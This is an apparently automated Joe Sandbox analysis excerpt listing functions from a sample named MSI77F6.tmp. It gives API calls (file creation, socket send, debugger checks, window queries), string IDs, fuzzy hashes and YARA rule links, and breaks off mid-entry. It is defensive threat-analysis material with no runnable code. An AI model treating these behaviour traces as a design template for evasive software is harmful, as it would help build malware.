                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Message$DispatchPeekTranslate
                                        • String ID:
                                        • API String ID: 4217535847-0
                                        • Opcode ID: 99e63347bc25c1a5862429a43538ae9b411671b66314216d8c866e8d4d7dba34
                                        • Instruction ID: 2684066594c84dbb5a2e933e62ea693d9c42fde86d7031ccdef288233664afe7
                                        • Opcode Fuzzy Hash: 99e63347bc25c1a5862429a43538ae9b411671b66314216d8c866e8d4d7dba34
                                        • Instruction Fuzzy Hash: 33F01C726543459BDF20EBE18C49B6BB7DDBB98784F148C3DF645C2080EBB8D9048726
                                        Function 0078058E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: CALL
                                        • API String ID: 0-4196123274
                                        • Opcode ID: 208e9d95ed6d7c1deb6c532b5851ee8f263944be09faa8b4e3b6363ead27db38
                                        • Instruction ID: ffe018677f4a2d155c470a2f6af0d779fba9199924bd7f66bf7b6f4c017e8219
                                        • Opcode Fuzzy Hash: 208e9d95ed6d7c1deb6c532b5851ee8f263944be09faa8b4e3b6363ead27db38
                                        • Instruction Fuzzy Hash: B1227170548341DFDB64EF24C494A2AB7E1FF84304F15896DE99A8B361D739EC89CB82
                                        Function 00774010 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID: EA06
                                        • API String ID: 4104443479-3962188686
                                        • Opcode ID: 7b5e763d73d8777f16adec4d70d86168a3aee21245788aeeaa564e66402cec59
                                        • Instruction ID: b15db2d120f6616ababc60e784b12d4e24156f5a7862acdcf3b12fc005f0c2b7
                                        • Opcode Fuzzy Hash: 7b5e763d73d8777f16adec4d70d86168a3aee21245788aeeaa564e66402cec59
                                        • Instruction Fuzzy Hash: DA418061A0425CDBCF21AB648C557BE7FA19B55380F68C4B4EA8EDB183C72D8DD0C7A1
                                        Function 007C013F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _wcscmp
                                        • String ID: 0.0.0.0
                                        • API String ID: 856254489-3771769585
                                        • Opcode ID: ae670e142b481115414f6bff747627346f41b88ca4daf3aef28c7b7d8f8e24a9
                                        • Instruction ID: 60c50a6e2f0c9cb74e17dd76ce08c94cec91a1be8a908984e06a928b049701d6
                                        • Opcode Fuzzy Hash: ae670e142b481115414f6bff747627346f41b88ca4daf3aef28c7b7d8f8e24a9
                                        • Instruction Fuzzy Hash: 1B11C135600208EFCB04EF54D995E9DB3A9BF88710B14C05DE909AF391DA78ED818BE0
                                        Function 00773BFF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 007E3CF1
                                          • Part of subcall function 007731B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 007731DA
                                          • Part of subcall function 00773A67: SHGetMalloc.SHELL32(1<w), ref: 00773A7D
                                          • Part of subcall function 00773A67: SHGetDesktopFolder.SHELL32(?), ref: 00773A8F
                                          • Part of subcall function 00773A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00773AD2
                                          • Part of subcall function 00773B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,008322E8,?), ref: 00773B65
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                                        • String ID: X
                                        • API String ID: 2727075218-3081909835
                                        • Opcode ID: b7a1bf869bcb65804ef7c6c145560c8799e629093561e4bb8713af396ee110b5
                                        • Instruction ID: aa63e723efc5075f573f01eb1e9a3d782f21f9db668f40f1b938aeee619422ba
                                        • Opcode Fuzzy Hash: b7a1bf869bcb65804ef7c6c145560c8799e629093561e4bb8713af396ee110b5
                                        • Instruction Fuzzy Hash: DE11A7B1A00298ABCF05DFD4D8096DE7BF9AF45704F008009E505BB281CBB95A499BA5
                                        Function 007734C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                        Download Yara Rule
                                        Strings
                                        • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 007E34AA
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                        • API String ID: 1029625771-2684727018
                                        • Opcode ID: 29e0d72e576262ca1bfc3edf82d2d3129c9d72e9d155357eac075b95c9252494
                                        • Instruction ID: 8d07bcc9107d78d2261819430c1b913358032834097dc380f7d7071f3544d12a
                                        • Opcode Fuzzy Hash: 29e0d72e576262ca1bfc3edf82d2d3129c9d72e9d155357eac075b95c9252494
                                        • Instruction Fuzzy Hash: B8F0687194124DFECF11EFB0D8559FFB778AA10340F10C526E82992182EB7C9B09DB20
                                        Function 007E813B Relevance: 3.2, APIs: 2, Instructions: 212COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ClearVariant
                                        • String ID:
                                        • API String ID: 1473721057-0
                                        • Opcode ID: 502320c349101a5c964bf9173c6fe600716899bfe148e2c9b17abb7c73e2e068
                                        • Instruction ID: 57319c74fb2b24e5e533ee402177d1fd5b89310c7c550aafe5c324bee1779be5
                                        • Opcode Fuzzy Hash: 502320c349101a5c964bf9173c6fe600716899bfe148e2c9b17abb7c73e2e068
                                        • Instruction Fuzzy Hash: 5B817E74A4050ADFCB24EF48C884AADF7B1FF44710F648569D8459B315D739ED82CB90
                                        Function 0078F461 Relevance: 3.2, APIs: 2, Instructions: 159COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5b811b4d7ef1a9cea132f86f070e0ce3f10c5805f0dbcb3c2ce8a3c65bc42718
                                        • Instruction ID: 2055a468714e79ba95a85d601f53c0f00dab17c05ca975c704d196f8b147e997
                                        • Opcode Fuzzy Hash: 5b811b4d7ef1a9cea132f86f070e0ce3f10c5805f0dbcb3c2ce8a3c65bc42718
                                        • Instruction Fuzzy Hash: 1551A431604301DFCB14FF28D495BAA73E5AF48364F14856DF95A8B292DB38E905CB52
                                        Function 007C8065 Relevance: 3.1, APIs: 2, Instructions: 98COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 007C8074
                                        • GetForegroundWindow.USER32 ref: 007C807A
                                          • Part of subcall function 007C6B19: GetWindowRect.USER32(?,?), ref: 007C6B2C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$CursorForegroundRect
                                        • String ID:
                                        • API String ID: 1066937146-0
                                        • Opcode ID: 7ddd95a02ee5711c8b211d48d8b4e1a4107dcbcfd96694254b3c07b0a7b57cda
                                        • Instruction ID: 0773d4a57877410c3960bced8080cf4fa9192e1fc0faea8f9d0fc950b525f1b8
                                        • Opcode Fuzzy Hash: 7ddd95a02ee5711c8b211d48d8b4e1a4107dcbcfd96694254b3c07b0a7b57cda
                                        • Instruction Fuzzy Hash: EA311C75A00218EFDB11EFA4C885AAEB7F4FF08314F14446DE945A7251DB38AE45CB51
                                        Function 00771DCE Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                        Download Yara Rule
                                        APIs
                                        • IsWindow.USER32(00000000), ref: 007EDB31
                                        • IsWindow.USER32(00000000), ref: 007EDB6B
                                          • Part of subcall function 00771F04: GetForegroundWindow.USER32 ref: 00771FBE
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$Foreground
                                        • String ID:
                                        • API String ID: 62970417-0
                                        • Opcode ID: e2a0d3514dd63c353227ea2bfe606fdec6e3db06894e01a174d80081563e7cab
                                        • Instruction ID: 5b5cce813ac2a293b757ea8ef9b6ae0900116d61fa3507b3e1ac86a53643a1cc
                                        • Opcode Fuzzy Hash: e2a0d3514dd63c353227ea2bfe606fdec6e3db06894e01a174d80081563e7cab
                                        • Instruction Fuzzy Hash: D821C0B2200246AADF20AB35C855BFE77AA9F443C5F008429F95ED6141EBB8ED02D760
                                        Function 007AE2E8 Relevance: 3.1, APIs: 2, Instructions: 69windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0077193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00771952
                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 007AE344
                                        • _strlen.LIBCMT ref: 007AE34F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout_strlen
                                        • String ID:
                                        • API String ID: 2777139624-0
                                        • Opcode ID: 3c97624477f454b8fd9caa165c109a2bf73afa9e99ba10d432acdd697009119c
                                        • Instruction ID: 180dabb16a21eb1e3c59f004d6e02b06e545d44e376884167ba8fa4bd80fd27d
                                        • Opcode Fuzzy Hash: 3c97624477f454b8fd9caa165c109a2bf73afa9e99ba10d432acdd697009119c
                                        • Instruction Fuzzy Hash: 6911CD31200205E7DF05BB68DCDADBF7BA99F86340B10453DF60ADB192DE6C9C4587A0
                                        Function 00773682 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                        Download Yara Rule
                                        APIs
                                        • 74A3C8D0.UXTHEME ref: 007736E6
                                          • Part of subcall function 00792025: __lock.LIBCMT ref: 0079202B
                                          • Part of subcall function 007732DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 007732F6
                                          • Part of subcall function 007732DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0077330B
                                          • Part of subcall function 0077374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0077376D
                                          • Part of subcall function 0077374E: IsDebuggerPresent.KERNEL32(?,?), ref: 0077377F
                                          • Part of subcall function 0077374E: GetFullPathNameW.KERNEL32(C:\Windows\Installer\MSI77F6.tmp,00000104,?,00831120,C:\Windows\Installer\MSI77F6.tmp,00831124,?,?), ref: 007737EE
                                          • Part of subcall function 0077374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00773860
                                        • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00773726
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                        • String ID:
                                        • API String ID: 3809921791-0
                                        • Opcode ID: e7f2312c05d80a8a6d9191c4fb0390a8e2481613b9c111c7838866ee694a084c
                                        • Instruction ID: b06c743c2dab0d29bef8024f03f047eed2bb06d502ed7b6279de9fb94fd55b3e
                                        • Opcode Fuzzy Hash: e7f2312c05d80a8a6d9191c4fb0390a8e2481613b9c111c7838866ee694a084c
                                        • Instruction Fuzzy Hash: EC115EB1948341DFC714EF29D84991ABBE8FBC4750F008A1EF444872B2DB789A55CF92
                                        Function 00774B88 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,00774C2B,?,?,?,?,0077BE63), ref: 00774BB6
                                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,00774C2B,?,?,?,?,0077BE63), ref: 007E4972
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: c7f26ec100ffb2e59341e1998c012bc96ba25f04e1ed5ed73fe7cef9b84ec256
                                        • Instruction ID: e178e16bb969aecd4a037cdd5e0d4754e3c7557a6bebe7a366adc5c6cb905d7c
                                        • Opcode Fuzzy Hash: c7f26ec100ffb2e59341e1998c012bc96ba25f04e1ed5ed73fe7cef9b84ec256
                                        • Instruction Fuzzy Hash: 290184B0144308BEF7344E148C8AF6637DCAB057A8F10C315BAE86A1E0C7B85C44CB14
                                        Function 0078F26B Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                        Download Yara Rule
                                        APIs
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,007BAEA5,?,?,00000000,00000008), ref: 0078F282
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,007BAEA5,?,?,00000000,00000008), ref: 0078F2A6
                                          • Part of subcall function 0078F2D0: _memmove.LIBCMT ref: 0078F307
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$_memmove
                                        • String ID:
                                        • API String ID: 3033907384-0
                                        • Opcode ID: a112db3d49e8ca6027839328fa3af83fc695d87f0a733e7afdc0f20037f7f2d7
                                        • Instruction ID: cd2247ad45aaf486d4556ff961e851b882f471e076651a41dfcb5ffefe35bd48
                                        • Opcode Fuzzy Hash: a112db3d49e8ca6027839328fa3af83fc695d87f0a733e7afdc0f20037f7f2d7
                                        • Instruction Fuzzy Hash: 88F0ECB6554118BFAB11AF65AC48CBF7BAEEF8A3607508026FD08CA111DA39DD40C7B5
                                        Function 0079F782 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___lock_fhandle.LIBCMT ref: 0079F7D9
                                        • __close_nolock.LIBCMT ref: 0079F7F2
                                          • Part of subcall function 0079886A: __getptd_noexit.LIBCMT ref: 0079886A
                                          • Part of subcall function 0079889E: __getptd_noexit.LIBCMT ref: 0079889E
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                        • String ID:
                                        • API String ID: 1046115767-0
                                        • Opcode ID: 483182df9091f46e352b3d79f7b07aed92728b12b400be269020d4fbf722ef48
                                        • Instruction ID: 16a0e4c6b10a47b47b4984600f15d852f2b289b7af7f17e22eb02c97cba2f0fa
                                        • Opcode Fuzzy Hash: 483182df9091f46e352b3d79f7b07aed92728b12b400be269020d4fbf722ef48
                                        • Instruction Fuzzy Hash: 5011C632815610DEDF517FA4B84AB587A506F42331F660650E4249F1E3CBBC990086A2
                                        Function 007C9500 Relevance: 3.0, APIs: 2, Instructions: 46networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • send.WS2_32(00000000,?,00000000,00000000), ref: 007C9534
                                        • WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 007C9557
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ErrorLastsend
                                        • String ID:
